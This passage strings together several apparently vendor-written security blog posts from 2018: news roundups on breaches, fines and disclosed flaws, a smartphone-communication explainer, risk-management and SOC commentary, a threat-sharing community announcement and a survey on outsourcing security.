time. Hackers are increasingly destroying logs to hide attacks | ZDNet Finding Gold in the Threat Intelligence Rush Threat intelligence feeds, sold for hundreds of thousands of dollars per year, are marketed on a specific premise: If an entity is seen acting maliciously in one place, it can be expected in others. But is that always true? Finding Gold in the Threat Intelligence Rush | Dark Reading DJI plugs security flaws that could have enabled access to users’ data and drone images If exploited, the vulnerability would have given an attacker full access to a user’s account and the information within it, including video footage and photos taken by their drone’s as well as flight paths, GPS locations and other confidential data, without the user being aware of any intrusion. Alexa, what’s the best way to burn a drone? DJI plugs security flaws that could have enabled access to users’ data and drone images | HelpNetSecurity Oracle’s VirtualBox vulnerability leaked by disgruntled researcher An independent researcher who was disgruntled with traditional bug bounty methods took it upon himself to leak the details of an exploit in Oracle’s Virtual Box without first informing Oracle. Sergey Zelenyuk discovered a flaw that would allow him to escape from the virtual environment of the guest machine to reach the Ring 3 privilege layer used for running code from most user programs with the least privileges. Oracle’s VirtualBox vulnerability leaked by disgruntled researcher | SC Magazine Other stories and articles I found interesting this week Retail focus is key to Alibaba’s new London datacentre | Computer Weekly What it takes to be a ‘Chief Data Officer’ in 2018 | IT Pro Portal How Amazon Makes Money: Amazon Business Model in a Nutshell | FourweekMBA
Are you familiar with all the ways that your smart phone communicates? The other evening, at dinner, I was describing to a friend how the VPN software I use on my phone masks my location when I am on the internet. Sometimes, am in Helsinki, and other times, I may be in another part of the world. My friend asked “how expensive are your data charges for all the texts you receive while you are masquerading around the globe?” I realized that she was unfamiliar with all the ways that a smart phone communicates. Others at the table were also curious. You have probably heard about how the smart phone in your pocket is more powerful than the computer that powered the Apollo Space missions. Not only is your phone computationally more powerful, but it can also communicate across more conduits, most of which did not exist back in those early days of space exploration. These technologies are separate and distinct. Here are some non-technical explanations that we, as InfoSec professionals, should share with our friends and family about how a phone communicates: Text messages rely on a cell number in order to function. This is controlled by the Subscriber Identity Module (the SIM card), which resides in the phone. Your SIM card holds your cell phone number. Anyone who can access your SIM card can make phone calls under your identity, and sadly, leave you holding the bill. This s why it is very important to report a lost phone to your cell phone provider. It does not matter if your phone is password protected. The SIM card can be used in any similar unlocked phone to make phone calls. Internet and other data connections are governed by your IP address. The phone relies on information from the SIM card to determine the carrier, but it does not use the same signal pathway as a text message. That is why using a VPN does not result in international text charges. You can connect to any Wi-Fi in absence of a SIM card. The Wi-Fi Signal does not need a phone number or a carrier to communicate. It is relying on the Wi-Fi provider to complete its connection. Of course, you cannot receive text messages without a SIM card, even on Wi-Fi. Usually, your phone will often remind you that there is no SIM card installed. Recently, 75% of Americans experienced a test of the “Presidential Alert” system. Even if your phone was in silent mode, the alert triggered the klaxon-level alarm on the device. This raised some speculation by none other than the comically adorable John McAfee about the presence of an “E911” chip on the phone. Bruce Schneier commented that, “This is, of course, ridiculous. I don't even know what an E911 chip is. And -- honestly -- if the NSA wanted in your phone, they would be a lot more subtle than this.” Remember that there are also both Bluetooth and Near Field Communication (NFC) capabilities on your phone. These are usually used in conjunction with the other communication features. For example, you can connect to your Bluetooth in your automobile and then use the phone to make a phone call. Although Bluetooth and NFC possess very short-range capabilities, they are yet another method by which your phone communicates to an external entity. The smart phone is truly a remarkable technological achievement. I wonder if most folks who own a smart phone have ever considered the various ways that these devices communicate, and one has to wonder how much they communicate without our knowledge or permission. Excuse me while I go and put my phone in the refrigerator.
https://pixabay.com/en/analytics-google-data-visits-page-3680198/Paste The use of big data and data from the internet of things (IoT) is changing business so rapidly it is hard to predict what is next, and financial analytics are certainly no exception. While the need for financial analysts continues to rise, the way analysts performs their day-to-day functions is evolving. More data than ever before is put into the evaluation of company financials, market analysis, and investment predictions. A company’s decision to issue bonds, split stock, or even initiate stock buyback options is much more informed than ever before. So where is data and financial analytics taking us in 2019? Here is a closer look: Advanced Analytics and Data Science https://www.gartner.com/ngw/globalassets/en/information-technology/documents/insights/100-data-and-analytics-predictions.pdf Data and analytics are more pervasive than ever in nearly every enterprise. They are increasingly the key to nearly every process a business engages in. These statistics tell the story best: Deep neural networks or deep learning is in 80 percent of data scientists’ toolboxes. By 2020 more than 40 percent of data science tasks will be automated. Nearly 50 percent of analytics queries are done via natural language queries (voice) or are auto-generated. In large part, this is due to wider adoption of artificial intelligence options. What this means for business and the future of analytics is simply this: by the end of 2019, 10 percent of IT hires will be writing scripts for bot interactions. In fact, according to the McKinsey Global Institute, despite the growth of both data and the use of artificial intelligence to analyze it, most companies are “only capturing a fraction of their potential value in terms of revenue and profit gains.” Their weaknesses, ones that can be solved with proper data and analytics, are many. Here are a few: Inefficient matching of supply and demand. Many companies are not taking advantage of analytics that can predict with amazing accuracy seasonal demand and annual lulls. Prevalence of underutilized assets. Many businesses have assets that sit idle or employees and departments duplicating tasks, something easily determined by honest analytics. Dependence on demographic data rather than more efficient behavioral data. Behavioral data says a lot more about both clients and employees, and is much easier to use. Over the next year, more companies will become dependent on analytics, and those companies who do not adapt will be three times more likely to fail. The Blockchain, Predictive Analytics, and Security What role does the blockchain play in all of this? The key is this: the blockchain security system is based on a shared ledger, a much more transparent way of saving data. Predictive analytics — essentially the ability to predict the future with some accuracy — requires a lot of data and until recently, a lot of specialized training. This is because data scientists are a new breed and help determine what data is appropriate for the predictive model. The more data produced, the more accurate the prediction. Thousands or sometimes even millions of points of data are needed. This data analytics is directly related to real-time decision making, and predictive analytics leads to goal setting and future business planning. These are all things business analysts learn through coursework and on-the-job training and understanding. Blockchain, because of the shared computing power it uses, can use natural language processing to determine the defining boundaries of the data to be analyzed. As mentioned above, more natural language queries than ever before will be posed, and blockchain has the ability to bring the power of artificial intelligence to even the smallest of businesses. Along with this power comes the security of blockchain and the stability of the data created (a complex discussion in and of itself). Multiple Expansion and a Bullish Market https://www.cnbc.com/2018/09/04/credit-suisse-releases-bullish-2019-stock-market-target.html From this financial analysis, Credit Suisse has given us our first financial predictions for 2019: it is going to be a bullish year, with annual gains of around 11.4 percent. That could mean that the Fed’s recent decisions to raise rates could be right on. Why? Because according to artificial intelligence, the next recession in the U.S. is expected to begin in 2019 according to the San Diego based company Intensity. What is this artificial intelligence method, and how does it compare to its human counterparts? The company’s forecasting “engine” relies on continual model updating, much like data scientists depend on analyzing the latest data. In fact, the company is comprised of data scientists, statisticians, and PhDs. The engine takes real-time data and feeds it into several different models, which it combines to make predictions that vary with real-time conditions. You can look at the latest prediction here, which says that a recession is 82 percent likely in the next 12 months and sets the likelihood over 50 percent in March of 2019. As 2019 approaches, this kind of data, fed into artificial intelligence and deep learning models, will impact how more companies than ever do business. While we can’t take the human factor out of the equation, it seems we are becoming more and more predictable — or the machines are just getting better at it. But as always, predictions, even those with supporting data, can be wrong. All we can do ist work with the data and have an advantage on the predictions being right.
It’s November already, where has the year gone? I can almost still remember typing out the words for the year’s first ‘Things I hearted’ blog back in January. Re-reading it now, it feels as if not much has changed, big messes, breaches, an in-fighting seemed like the usual for the year. I was speaking with my colleague Chris Doman a couple of days ago, and he did point out that 2018 overall has largely been better because we haven’t seen any large scale attack like WannaCry. He did pause and then add “yet” - so I suppose you could say we’ve improved because this year has caused less havoc than last year? Let’s chalk risk reduction down to a win and get on with it. IBM Acquired Red Hat A few weeks ago, prior to the announcement of the acquisition, IBM came up in discussion with a few friends and one of them said that IBM is one of those companies that everyone has heard of, but hardly anyone knows what they exactly do outside of a few services they use. As the cool kids say, this may have been a statement designed to “throw shade” (young and hip people, please correct me if I’ve used the term incorrectly - I already embarrass my children enough by misusing lingo), but the fact is that the statement is rather true, only because most people are still trying to work out why IBM would shell out 33.4 Instagrams for Red Hat. IBM acquires Red Hat, but what does that mean? | 451 Research blog Why IBM bought Red Hat: It's all open source cloud, all the time | ZDNet 6 Things to Know About IBM's $34B Acquisition of Red Hat | CMS Wire IBMs old playbook | Stratechery The Supply Chain I won’t give any more air time to that ridiculous ‘grain of rice’ Bloomberg story. However, it did give everyone time to pause and think about the supply-chain and how fragile it is. It’s easy to overlook the reliance businesses have on partners and their security. Dan Goodin took a peek behind the curtain of this shady practice and wrote on two supply-chain attacks. Two new supply-chain attacks come to light in less than a week | Ars Technica Would you Compromise Privacy for $850m? Under pressure from Mark Zuckerberg and Sheryl Sandberg to monetize WhatsApp, Brian Acton pushed back as Facebook questioned the encryption he'd helped build and laid the groundwork to show targeted ads and facilitate commercial messaging. Acton also walked away from Facebook a year before his final tranche of stock grants vested. “It was like, okay, well, you want to do these things I don’t want to do,” Acton says. “It’s better if I get out of your way. And I did.” It was perhaps the most expensive moral stand in history. Acton took a screenshot of the stock price on his way out the door—the decision cost him $850 million. WhatsApp Cofounder Brian Acton Gives The Inside Story On #DeleteFacebook And Why He Left $850 Million Behind | Forbes On the topic of money for ads We posed as 100 Senators to run ads on Facebook. Facebook approved all of them. | Vice On the other side of privacy. Tim Cook blasts 'weaponisation' of personal data and praises GDPR | BBC What are Everyone’s Kids Doing at School? Another one to be filed under “what were they thinking?” - both the developers, and to be honest, do schools really need to share every minor detail via an online portal? What happened to good old-fashioned parent-teacher meetings? Remini, a smartphone app that launched in 2013, aims to provide parents and educators with a social network to follow a child’s progress throughout school and their early life, documenting important milestones and letting parents share images with their child’s school. But Remini exposed these, and the personal information of its users to the internet writ large, thanks to an API that let anyone pull the data without any sort of authentication. The data included email addresses, phone numbers, and the documented moments of the children as well as their profile photos, according to a researcher who discovered the issue. 'Remini' App Used by Schools Left Personal Info Open to the World | Motherboard Pakistani Bank Has Millions Taken Apparently Bank Islami Pakistan was subject to a massive attack where many customers reported seeing transactions on their cards abroad. It’s alleged that attackers were able to breach the data centre of the bank and sold the customer details. I found this interesting because Pakistani businesses probably have had lesser worries in the past. But as organisations such as banks go through a digital transformation, they are opening themselves up to a much broader range of threats. Something, they probably haven’t accounted for. It’s not too dissimilar to what we see in other parts of the world, where companies such as small or medium businesses didn’t used to get attacked as often, but now it’s pretty much a daily part of life. Bank Islami Comes Under Biggest Cyber Attack of Pakistan’s History | Daily Punch Explain TLS Easily A good way to explain TLS to someone. The Illustrated TLS Connection | @XargsNotBombs How to Choose Which Conference to Attend There’s no way to say this nicely, but there are just too many security conferences in the world today. I think it would be a good idea to try to emulate Tom Hanks from “The Terminal”, but instead of living in an airport, see if one can spend a whole year or half a year only going to conferences. Actually, that sounds like a terrible idea, don’t try it. But what makes a conference worth attending or not? I found a good post by Valerie Lyons which may help you decide. Conference trick: how to choose worthwhile security and privacy events – and which to avoid | BH Consulting
This is perspective from one of our MSSP partners, CyberHat. Formula 1 is a serious business. It takes years of expertise and practical foot work to design, build and operate a winning Formula 1 team. It's easy to think that success depends on the car and the technology. But in reality, a cutting edge engine in the best car in the world can’t win a race alone. Without an expert driver and a highly experienced and dedicated support team, you just can’t finish first. When it comes to Cybersecurity everyone wants to win the race of protecting their assets and detecting and responding to threats to mitigate risk. Most organizations today will invest heavily in cyber security technology, buying it, integrating it and implementing into the organization, yet very few will focus on the teams driving the technology, supporting and utilizing it. It’s a simple belief that if you get a good enough car, you don’t need to be a good driver, when the reality is exactly the opposite – if you’re a good enough driver, you can get a lot out of pretty much every car. Today, more and more companies are looking for fully encompassing cyber security solutions and are gradually consolidating in to Security Operation Centers (SOC)s to help manage their security issues and this is a smart move. SOCs are where Cybersecurity teams detect, analyze and respond to threats on an organization. Their core task is to use the tools and skills at hand in order to provide the organization with an ongoing, relevant and professional security posture. Yet in the current cybersecurity landscape not all SOCs were created equal. It is important to understand what components are imperative for a SOC to be most effective. Formula 1 fact: The best Formula 1 Pit Crew can refuel and change a tire in just 3 seconds. They are the best in their field and they are dedicated to a strong set of processes. This is true for the SOC team as well. High expertise and seamless teamwork are important to effectively curtail the dangers of cyber-attacks and navigate the cyber field safely and in a timely manner. Many SOCs might have dedicated Tier 1/2 analysts, who can change tires and refuel seamlessly on the usual runbook procedures for many common or predictable cyber threats, but they are not experts in managing larger scale incidents like a blown gasket or jammed piston which entails the response of more experienced Mechanical Team or in Cyber Tier 3/4 Analysts. These are highly trained specialized professionals with in-depth experience that are able to tackle complex unusual incidences and attacks under severe time pressure. For example, sometimes cyber-attacks cannot be detected, deflected or blocked before they begin. Then it is the SOCs responsibility to contain and protect as well as investigate and conduct a meticulous analysis for preventing similar incidences, through a dedicated Forensics Team. The Forensics Team of a SOC is dedicated to evaluating necessary damage repair and implementing novel or near realtime responses. The core trade for a professional is the old saying – “practice makes perfect”, it’s a simple question of constantly getting your hands dirty with the nitty gritty work, repeatedly executing complex tasks in as versatile an environment as possible, is the only way to become a professional and the only way to stay one. Not all security issues are as dramatic as a direct attack but are measured in how “ready” your organization is for the when scenarios. In the race to being secure, organizations many times fail to properly calibrate or stay up to date with internal components - whether it is infrastructure or personnel. A dedicated SOC has an Onboarding Team that ensures that specific security and IT elements like Security Incident Event Management or SIEMs are properly configured and calibrated and that employees are properly trained to understand, analyze and act in response output. Just like a Formula 1 team, when a SOC has a solid, strong and professional Cybersecurity team, the synergy in the teamwork ensures optimal performance and protection within the dynamic and complex cybersecurity world. Professionalism is the key to effectively curtailing the dangers of cyber-attacks. Ensuring a complete, professional and experienced team is what turns an ordinary team into a winning team. As it is said "The whole is only as good as the sum of its parts". Register for our webinar on Thursday, November 8th at 1pm CST to learn more about how profesional SOC are designed, built and operates.
I attended the Cybersecurity Summit in Phoenix recently and presented on the topic of minimizing risk. There were some great conversations around the value of risk management within the cyber threat landscape. Here are some of my musings from the event. We are now at the forefront of a world of digital transformation. Beyond being a buzz word digital is part and parcel of our daily lives today. According to the World Economic Forum report earlier this year, cyber-attacks and date theft/fraud bubbled up to number two and three of the top five threats in terms of likelihood of occurrence and cyber risks intensified. With the scale of attacks today, along with the ingrained expectation that you’re either an organization that has been breached or you’re going to be, there is a lot of chatter about investments being made in cybersecurity technologies and how breaches still happen. Prevention is now being balanced with detection and response. Given this, the focus has turned to the need for cyber to be addressed as a business challenge and measurement of risk is key. Before you go ahead with a cybersecurity investment plan for 2019, consider answering the questions below. • What are your top 5 cyber risks based on priority? • Can you describe the actual loss impact in business terms for each of your top 5 risks? • How are these cyber risk impacts aligned to your risk appetite? •Are you truly reporting on cyber risks or is it compliance driven with reporting on control effectiveness? • Have you considered how you plan to deal with the current risks, emerging risks and treat these risks on an ongoing basis? A common business edict is: “If we can measure it, we can manage it.” In the security space, the term GRC (Governance, Risk and Compliance) is common, but typically most organizations have been driven by the compliance focus. Spending has been primarily compliance driven, and along the way, too many risk assessments have been conducted with a checklist approach. As you plan for the 2019 cybersecurity budget, here are four handy tips to consider that can help cut to the core of cyber risk management. 1. Risk counts, but don’t just be counting Counting all the risks – as an end – is just a part of thorough risk identification. The question is not, in any case, how many risks you can think up, but what is relevant to your business, i.e. what exactly the key vulnerabilities are in achieving your business objectives. 2. Ongoing debate of Qualitative versus Quantitative The key here is structured versus abstract. You must be able to measure the risk and quantify it. However, if your organization is going the qualitative route, keep in mind you must back the risk with data to differentiate the levels of risk. After you have conducted a meaningful risk assessment to identify the inherent risks faced because of the business you do, the next step will be to understand what Risk Mitigation strategies are required, with what priority, invoking what resources. 3. Continuous Cyber Risk Monitoring Cyber risk presents a moving target as organizations undergo major transformations by accelerating cloud adoption, increasing digital transformation investments, and advancing data analytics sophistication. As these transformations continuously grow the digital footprint, they outpace the security protections companies have in place. 4. Know your Risk Appetite Cyber risks are impossible to eliminate, resources are finite, risk profiles are ever-changing; and getting close to secure is elusive. The current level of controls for security and privacy that are effective in reducing cyber risk to an acceptable level today will inevitably become inadequate in the future – even sooner than many may realize. It is a truism that different types of risk require different types of defensive strategies. A more specific idea is that defensive measures should be proportionate in cost to the potential harm that may be suffered through a data breach and the likelihood of that breach occurring. The key is to balance risk versus reward. Conclusion Risk management is at a fascinating point in its evolution. It is now recognized to be not only fundamental to an organizations financial stability and regulatory compliance, but also an essential part of the cybersecurity strategy. Defining the best security measures can be difficult because each organization has different goals, requirements, and tolerance for risk. All organizations need to assess what they have in place today, review where they want to be in the future, and build a roadmap that will help them reduce their risk as their business expands. How are you able to identify and address new risks quickly while you deliver new technologies? Would love to hear successful techniques and insights on your partnership with finance, operations, and the businesses as we move to the risk function of the future?
Today, I’m excited to announce that AlienVault® Open Threat Exchange® (OTX™) has grown to 100,000 global participants, representing 36% percent year-over-year growth. AlienVault OTX, launched in 2012, is the world’s first free threat intelligence community that enables real-time collaboration between security researchers and IT security practitioners from around the world. Every day, participants from more than 140 countries contribute 19 million pieces of threat data to the community. OTX enables companies and government agencies to gather and share relevant, timely, and accurate information about new or ongoing cyber-attacks and threats as quickly as possible to avoid major breaches (or minimize the damage from an attack). As Russell Spitler, SVP of Product for AlienVault, an AT&T company, explains, “Attackers rely on isolation - they benefit when defenders don’t talk to each other. We can’t be everywhere at once, but they can learn from each others’ experience. With the growth in OTX membership, we all benefit from the diversity of threat intelligence from an even wider variety of participants.” To provide big-picture perspective on the billions of security artifacts contributed to OTX this year, AlienVault Security Advocate Javvad Malik and Threat Engineer Chris Doman have created the OTX Trends Report for 2018 Q1 and Q2. Like the 2017 report, this analysis reveals trends across exploits, malware, and threat actors, including top-ten rankings of the most seen exploits and adversaries recorded in vendor reports. The analysis reveals changes in the threat landscape, including a shift in the most reported exploits. For example, this year’s report reveals a rise in server exploits, as well as marking the first time an exploit targeting IoT devices (GPON Routers) has made the list of most-seen exploits. Encouragingly, the OTX Trends Report shows an uptick in information sharing across the InfoSec industry, including a plethora of independent research sharing on Twitter. According to the report, “As more companies and researchers look at ways to share threat data, we see more usable and useful information flow into OTX. This openness and collaboration has resulted not only in organisations being able to defend themselves better - but increasing circles of trust within the industry where actual threat intelligence is being shared more openly. A trend that we have seen grow over the years.” The sheer volume of security events included in the OTX Trends Report reflects the importance of keeping up with the latest threat intelligence. Without threat sharing, malicious actors can easily reuse effective exploits and pivot their attacks from target to target. A campaign affecting the UK legal industry can be repurposed for bankers in the United States, while security researchers operating in silos start from scratch each time. For example, the OTX Trends Report shows that the most commonly reported exploit, CVE-2017-11882, has been reused widely. By joining OTX, participants can strengthen their defenses and share real-time information about emerging threats, attack methods, and malicious actors. The diversity of OTX participants representing different countries, industries, and organization sizes provides every community member with more comprehensive set of data, enabling better threat detection. Beyond participant-contributed threat indicators, the OTX community also benefits from the robust threat data provided by AlienVault’s broad network of OTX partners, including Intel, Microsoft MAPP, Cyber Threat Alliance, QiHoo360, Telefonica, Hewlett-Packard Enterprise, and more. OTX partner contributions enrich the threat intelligence data available within the community and support the analytics available to OTX participants. This collaboration across the InfoSec industry provides added assurance that participants have the information they need to detect the latest threats as they emerge. In addition, OTX can serve as a STIX / TAXII provider and platform, enabling ISACs and other threat intelligence providers to share their curated threat intelligence through STIX/TAXII to their devices or to their customers. AlienVault has made it easier than ever to leverage OTX data to detect and respond to threats in your own environment. Earlier this year, we introduced OTX Endpoint Security™, a free service in OTX that allows anyone to quickly identify threats by scanning their critical endpoints. OTX participants can use the osquery-based AlienVault Agent to scan their endpoints for the presence of known indicators of compromise catalogued in OTX. For example, when a major attack like Petya or WannaCry occurs, OTX participants can run queries against the latest threat data in OTX pulses to find out if their endpoints have been compromised, without requiring additional security products. OTX Endpoint Security is available to all registered OTX participants at no cost. For users of AlienVault USM Anywhere™, OTX provides even deeper benefits. AlienVault USM Anywhere consumes OTX threat data in multiple ways, enabling busy security teams to detect and respond to the latest global threats as they emerge, without extra cost or effort. As Lee Thomas Hagen, Strategic Consulting, Dataprise, Inc. explains, "With AlienVault we have been able to reduce lag times by not having to invest into specialized research for which we rely on AlienVault Security Labs and OTX." The AlienVault Labs Security Research Team consumes OTX threat data, applying machine learning and human analysis to validate and expand on the threat scenarios. The team uses this intelligence to curate and deliver continuous threat intelligence updates to USM Anywhere. USM Anywhere users can subscribe to OTX threat data and use it directly for correlation with any connected data source. Whether integrated directly with USM Anywhere or synchronized with your other security products through the OTX DirectConnect API, emerging threat data from OTX can help your team keep up with the ever-changing threat landscape. According to Christian B. Caldarone, Information Security Officer at Deutsche Post Dialog Solutions GmbH, "AlienVault USM is very effective in detecting real security threats, as their OTX integrated threat intelligence has a very good reputation in the industry. Thanks to its being open to others too, other heavyweight champions like the Bro security monitor can integrate the OTX feed too (yes and this is done by many security people out there). This says more than words." Additional Resources: Read the OTX Trends Report for 2018 Q1 and Q2 Join the AlienVault Open Threat Exchange today New! Free Threat Hunting Service from AlienVault – OTX Endpoint Security™ Learn more about threat intelligence in USM Anywhere Take USM Anywhere for a test drive in the online demo
We love conducting surveys at conferences. Not only do we gain insights from some of the smartest people in attendance, but we get a few extra minutes to mingle and get to know them better. So, while we were at SpiceWorld in Austin this year, we sought to capture thoughts on outsourcing security. Of the attendees, 380 participated in our survey to bring us the following insights. How Much is Outsourced? The first question was to establish a baseline as to how current security operations programs are currently sourced. A majority, at 60 percent, run security operations completely in-house. On the other side of the spectrum, a shade under 5 percent of participants’ companies completely outsource security operations. The remaining participants outsource some aspects of their security operations with most keeping the majority of functions in-house. Attitudes Towards Outsourcing The question that then arises is how participants felt about outsourcing security operations as a whole. Just over a quarter, 26 percent, believed that security should never be outsourced. However, 41 percent believed that security operations should be outsourced as much as possible, as long as the service provider is good. Perhaps the key point here is the caveat being the quality of the service provider. Companies looking to outsource any aspect of its security operations should vet potential providers and assured that the provider is fulfilling its part of the deal. Gaining that assurance can take many forms. At a simple level it could be unplugging a server and waiting to see how long it takes for the provider to notice. Alternatively, at the risk of sounding like Jeremiah Grossman, the right incentives are needed here. Be that in the form of the vendor providing some warranty, or even insurance. Another aspect which we did not go into were some of the drivers that lead to companies outsourcing. The skills gap is an important discussion point. Many companies don’t have the right staff, or the right number of staff internally to fulfill the increasing needs. According to the 2018 (ISC)2 Cybersecurity Workforce Study, there is a shortage of nearly 3 million cybersecurity professionals. Another factor could be that many security operations tools, technologies, and processes have become increasingly standardised over the years. This standardisation allows companies to outsource certain aspects of security operations in a relatively commoditised manner. Budgets In an attempt to get an indication as to the direction the market is heading, we sought to understand budgets and future spending trends. The majority of participants believe that the return on investment is justified when outsourcing security. This should not be surprising for most security operations tasks that have good economies of scale. Furthermore, both in-house and outsourced security operations budgets are largely looking to increase. For in house-security operations, 33 percent reported a planned increase in budget over the coming year, and 25 percent are looking to spend more on outsourcing security operations. Conclusion In a short survey with a limited audience set, it is difficult to draw hard and definitive conclusions, but it does provide some good indicators that are worth exploring. Compared to a few years ago, there appears to be greater acceptance and adoption of managed security partners to handle security operations. This trend looks to increase with a combination of factors including a skills shortage, standardisation of security operations technologies and processes, and an increased level of confidence in the services and monetary value offered by service providers.
Wordpress Wants to Erase its Past I was just flexing my clickbait title muscles with the heading here. But according to a talk at DerbyCon, the WordPress security team stated its biggest battle is not against hackers but its own users, millions of which continue to run sites on older versions of the CMS, and who regularly fail to apply updates to the CMS core, plugins, or themes. WordPress team working on "wiping older versions from existence on the internet" | ZDNet The Penalties Keep Rolling in Looks like the regulators have recently seen the Arnie classic, Pumping Iron, as they flex their muscles to penalise companies for lax security. First up, supermarket giant Morrisons has been told by the Court of Appeal that it is liable for the actions of a malicious insider who breached data on 100,000 employees, setting up a potential hefty class action pay-out. Morrisons Loses Insider Breach Liability Appeal | InfoSecurity Magazine In other news, Facebook has been fined £500,000 by the UK's data protection watchdog for its role in the Cambridge Analytica data scandal. The Information Commissioner's Office (ICO) said Facebook had let a "serious breach" of the law take place. The fine is the maximum allowed under the old data protection rules that applied before GDPR took effect in May. Facebook fined £500,000 for Cambridge Analytica scandal | BBC Breaches at 32,000 feet Cathay Pacific has admitted that personal data on up to 9.4 million passengers, including their passport numbers, has been accessed by unauthorised personnel in the latest security screw-up to hit the airline industry. Cathay Pacific hack: Personal data of up to 9.4 million airline passengers laid bare | The Register British Airways still encountering turbulence following its hack in September has revealed a further 185,000 customer details could have been compromised! British Airways reveals a further 185,000 users affected in September data hack | City AM Fool Me Once Children’s Hospital of Philadelphia has reported two data breaches that occurred in August and September of 2018. The hospital on August 24 discovered that hacker had accessed a physician’s email account on August 23 via a phishing attack. A second breach found on September 6 revealed unauthorized access to an additional email account on August 29. Children’s Hospital of Philadelphia victimized twice by phishing attacks | Health Data Management Some Notes for Journalists About Cybersecurity The recent Bloomberg article about Chinese hacking motherboards is a great opportunity to talk about problems with journalism. Journalism is about telling the truth, not a close approximation of the truth, but the true truth. They don't do a good job at this in cybersecurity. Some notes for journalists about cybersecurity | Errata Security CVE-2018–8414: A Case Study in Responsible Disclosure Vulnerability management and responsible disclosure can be a tricky tightrope to walk at times. But this writeup by Matt Nelson on the process he recently went through is really insightful. CVE-2018–8414: A Case Study in Responsible Disclosure | Medium, Matt Nelson What Does it Take to be a CISO? How do people working in a Chief Information Security Officer (CISO) position or its equivalent view cybersecurity? Which problems do they face? To learn the answers to those questions, Kaspersky Lab surveyed 250 security directors from around the world. What it takes to be a CISO: Success and leadership in corporate IT security | Kaspersky The Hunting Cycle and Measuring Success This is an older article I came across, but the principles are worthwhile going over again. The Hunting Cycle and Measuring Success | Finding Bad Other Things I Liked This Week The Wildly Unregulated Practice of Undercover Cops Friending People on Facebook | The Root Compassionate—Yet Candid—Code Reviews | YouTube, April Wensel
This is the last in our blog series on security awareness to celebrate National Cyber Security Awareness Month (NCSAM). We decided to take on social media sharing tips, and we tapped the Spiceworks community of IT pros for tips and tricks. We made it a contest, with the winner getting a $200 airline voucher. Here is the winning entry: We we received plent of other great ideas. One of the prevalent ones was using multi-factor authentication. A second prevalent idea was avoiding social media, which certainly would protect security and privacy, but possibly also be no-fun :( There were also many mentions of using password managers. Click bait was pointed out as a problem to avoid. Here some other interesting perspectives. Even though I couldn't win the contest, I tossed in one of my favorite ways to stay safe online. There was also a very novel way to protect onine purchases, but it's so much work! Thanks to everyone contributing ideas! The original post in Spiceworks is here.
Volume 8 of the AT&T Cyber Insights report looked into whether organizations who are investing more in cybersecurity are achieving better outcomes than those who aren’t. The outcome of the research was a resounding no. On the surface, this may seem counter-productive. After all, how many CISO’s have you ever heard complain about having too much security? However, if we look at the trend as an inverted U, or the law of diminishing returns, when you overdo something, you eventually stop seeing benefits, and may even see losses. Getting the Porridge just Right Much like Goldilocks, the question that arises is how much security is just right? Former Director of the Enterprise Security Practice at 451 Research, Wendy Nather, wanted to establish The Real Cost of Security. In her research, security professionals provided a wide range of responses as to what security technologies are needed, with the majority of the respondents being able to trim down their list to around 10. The pricing of these 10 technologies varied greatly depending on a number of factors such as vendor, mode of deployment, whether it was open source, and so on - the price range varied anywhere from $225,000 to $1.46m in the first year, including technology and staff. Expense in Depth For many companies, especially those with small or mid-sized security teams, managing 10 or more individual security products can be challenging. Former Forrester analyst Rick Holland coined the phrase ‘expense in depth’. That is where many companies will use the defense in depth concept to justify the need for more security products. The problem with this approach is that it can lead to buying too many technologies which don’t complement each other, which inevitably results in a multi-layered approach that provides minimal return on investment. This leads us to a bit of an impasse. A variety of security controls are needed to provide adequate coverage. But too many security products lead to an increase in expense not just to procure, but to manage, which can lead to security shelfware. More Capability in Fewer Products In order to avoid some of these pitfalls, companies, especially ones with small to mid-sized security teams, should look to invest in fewer products that offer greater functionality. The good news is that many security technologies have become standardised and no longer need to be acquired or deployed individually. For example, vulnerability scanning is largely a standardised function. While some scanners may perform better than others - by and large, you can point it to your assets and receive an expected output. So, the question companies should ask, what benefits are being gained by running vulnerability scanning as a separate service with a standalone technology? Compare this to a platform which offers several security functions of which vulnerability scanning is one. The same could be said for anti-virus, or IDS, or SIEM’s. The value in running any of these as dedicated standalone services is diminishing. Take the example of your smartphone. It has replaced many devices such as a pager, phone, camera, even a flashlight, into one device. One could argue that a standalone dedicated camera, or flashlight is a superior product, which may be true, but it comes with the overhead of additional batteries, and carrying those devices around. Getting a Helping Hand In addition to reducing the number of disparate security products, companies can also take advantage of managed security providers that can complement their teams’ security capabilities. This can be a good approach to offload non-critical monitoring tasks, so that the in-house security team can focus solely on protecting the crown jewels within the organisation. One of the additional benefits of this approach is that it takes the process of choosing the right technology away, too. The MSSP will monitor logs and alert you if there is something that warrants further investigation. Think of it like your energy provider. You may not know how your provider is generating electricity, maybe it’s burning coal, or using wind-farms, solar energy, or some other option, the end result is the same - you receive a consistent supply of electricity coming into your home. Insurance The third leg of the stool could be cyber insurance. This is perhaps of more importance for smaller companies wanting to do business with large enterprises which may insist on cyber insurance in the event of an incident or a breach. As companies rely more and more on their digital infrastructure, any disruption has greater impact on the bottom line. Ransomware can grind businesses to a halt, and leak of sensitive documents can have far-reaching consequences such as damaging critical business relationships. Managing the Risk Ultimately, cybersecurity boils down to managing risk. As Todd Waskelis, AVP at AT&T cybersecurity solutions said, “It’s not about the number of dollars an organisation spends that leads to them reducing risk. It’s whether you have approached this from a business perspective and you have a risk management program that will not go stale.” Having a business-focused risk management plan doesn’t mean having all of the best security technologies in place. Sometimes it means having enough of the right security technologies in place, having the right partners, and even transferring some of the risk via cyber insurance. Considerations for your security strategy: Consolidate your security tools Outsource functions to an MSSP Offshore some risks via Cyber-insurance